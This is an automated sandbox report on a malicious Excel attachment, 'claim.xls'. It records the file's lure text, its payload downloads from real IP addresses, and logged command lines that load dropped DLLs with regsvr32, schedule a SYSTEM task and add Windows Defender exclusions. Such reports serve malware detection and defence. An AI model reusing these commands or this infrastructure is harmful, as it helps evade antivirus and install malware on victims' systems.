Windows Analysis Report claim.xls

Overview

General Information

Sample Name: claim.xls
Analysis ID: 491045
MD5: a120450ebe7f6455d46abd85369a002a
SHA1: 465a1f7e2aa26ce3e109c2dc559fb13e39ad8fb1
SHA256: 6bf7483d996493cef544eed71355aacc8b3566cbd05639cc377fff248881e97e
Tags: xls

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat ReversingLabs: Detection: 28%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.475215539.0000000002701000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000003.530389514.0000000002811000.00000004.00000001.sdmp
Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.475053878.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.476401162.0000000002701000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.530135383.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.536158906.000000001002A000.00000002.00020000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW, 5_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000DAEB4 FindFirstFileW,FindNextFileW, 6_2_000DAEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0008AEB4 FindFirstFileW,FindNextFileW, 13_2_0008AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0011AEB4 FindFirstFileW,FindNextFileW, 16_2_0011AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW, 23_2_0008AEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44466.2404627315[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 03:45:34 GMT Content-Type: application/octet-stream Content-Length: 495616 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44466.2404627315.dat"
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 03:45:39 GMT Content-Type: application/octet-stream Content-Length: 495616 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44466.2404627315.dat"
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 03:45:41 GMT Content-Type: application/octet-stream Content-Length: 495616 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44466.2404627315.dat"
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.14.37.173 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 111.90.148.104 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 51.89.115.111 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: regsvr32.exe, 00000005.00000002.474574809.0000000002190000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.848154022.0000000002120000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.528621446.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.535794158.0000000000D60000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.475485360.0000000001D30000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.474285811.00000000009C0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.530747948.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.528341049.0000000001F00000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.536794194.0000000000940000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.534801061.0000000000840000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000005.00000002.474574809.0000000002190000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.848154022.0000000002120000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.528621446.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.535794158.0000000000D60000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000002.530873315.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.14.37.173 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 111.90.148.104 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 51.89.115.111 Connection: Keep-Alive

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
Source: Screenshot number: 4 Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
Source: Document image extraction number: 0 Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
Source: Document image extraction number: 1 Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa2.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa1.der
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10016EB0 5_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10012346 5_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10011758 5_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10014FC0 5_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E6EB0 6_2_000E6EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E2346 6_2_000E2346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E1758 6_2_000E1758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E4FC0 6_2_000E4FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00096EB0 13_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00092346 13_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00091758 13_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00094FC0 13_2_00094FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00126EB0 16_2_00126EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00121758 16_2_00121758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00122346 16_2_00122346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00124FC0 16_2_00124FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00096EB0 23_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00092346 23_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00091758 23_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00094FC0 23_2_00094FC0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: claim.xls OLE, VBA macro line: Sub auto_open()
Source: claim.xls OLE, VBA macro line: Sub auto_close()
Source: claim.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: claim.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Source: claim.xls OLE, VBA macro line: m_openAlreadyRan = True
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 5_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 5_2_1000CB77
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Fiosa2.der.23.dr Static PE information: No import functions for PE file found
Source: Fiosa.der.6.dr Static PE information: No import functions for PE file found
Source: Fiosa1.der.13.dr Static PE information: No import functions for PE file found
Source: Fiosa.der.16.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0'
Document contains embedded VBA macros
Source: claim.xls OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: 44466.2404627315[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fiosa.der.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44466.2404627315[2].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fiosa1.der.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44466.2404627315[3].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fiosa2.der.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................(..........&z.....(.P...............................................................................................(..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: The operation completed successfully.
Source: C:\Windows\System32\reg.exe Console Write: The operation completed successfully.
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Orvzzr' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCCDF.tmp
Source: classification engine Classification label: mal100.expl.evad.winXLS@33/11@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 5_2_1000D523
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: claim.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 5_2_1000ABA3
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{13A70D02-D596-49D3-85D8-F794E715B0BB}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{C87EDD02-7E1F-45D7-84EE-25BBD0EE0EFA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{13A70D02-D596-49D3-85D8-F794E715B0BB}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{1E547147-A808-494B-A26E-4EDF51CE11CC}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C87EDD02-7E1F-45D7-84EE-25BBD0EE0EFA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{1E547147-A808-494B-A26E-4EDF51CE11CC}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000A51A FindResourceA, 5_2_1000A51A
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.475215539.0000000002701000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000003.530389514.0000000002811000.00000004.00000001.sdmp
Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.475053878.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.476401162.0000000002701000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.530135383.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.536158906.000000001002A000.00000002.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1002202C push es; ret 5_2_1002202D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10021C96 pushad ; iretd 5_2_10021C9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 5_2_10026CF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10026105 push edi; ret 5_2_1002611C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1002514B pushad ; iretd 5_2_1002514C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10027D58 pushfd ; ret 5_2_10027DEC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10027679 push es; ret 5_2_100276FB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10023B27 push es; retf 5_2_10023BA0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10022F6D push eax; retf 5_2_10022F97
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10022FAA push eax; retf 5_2_10022F97
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000EA00E push ebx; ret 6_2_000EA00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000ED485 push FFFFFF8Ah; iretd 6_2_000ED50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000ED4B6 push FFFFFF8Ah; iretd 6_2_000ED50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E9D5C push cs; iretd 6_2_000E9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E9E5E push cs; iretd 6_2_000E9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000EBB29 push esi; iretd 6_2_000EBB2E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002202C push es; ret 9_2_1002202D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10021C96 pushad ; iretd 9_2_10021C9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 9_2_10026CF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10026105 push edi; ret 9_2_1002611C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002514B pushad ; iretd 9_2_1002514C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10027D58 pushfd ; ret 9_2_10027DEC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10027679 push es; ret 9_2_100276FB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10023B27 push es; retf 9_2_10023BA0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10022F6D push eax; retf 9_2_10022F97
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10022FAA push eax; retf 9_2_10022F97
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1002202C push es; ret 12_2_1002202D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10021C96 pushad ; iretd 12_2_10021C9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 12_2_10026CF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10026105 push edi; ret 12_2_1002611C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1002514B pushad ; iretd 12_2_1002514C
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 5_2_10012AEC
PE file contains an invalid checksum
Source: Fiosa2.der.23.dr Static PE information: real checksum: 0x7fed4 should be: 0x816c9
Source: Fiosa.der.6.dr Static PE information: real checksum: 0x7fed4 should be: 0x101479
Source: Fiosa1.der.13.dr Static PE information: real checksum: 0x7fed4 should be: 0x816c9
Source: Fiosa.der.16.dr Static PE information: real checksum: 0x7fed4 should be: 0x816c9

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa1.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der
Drops PE files
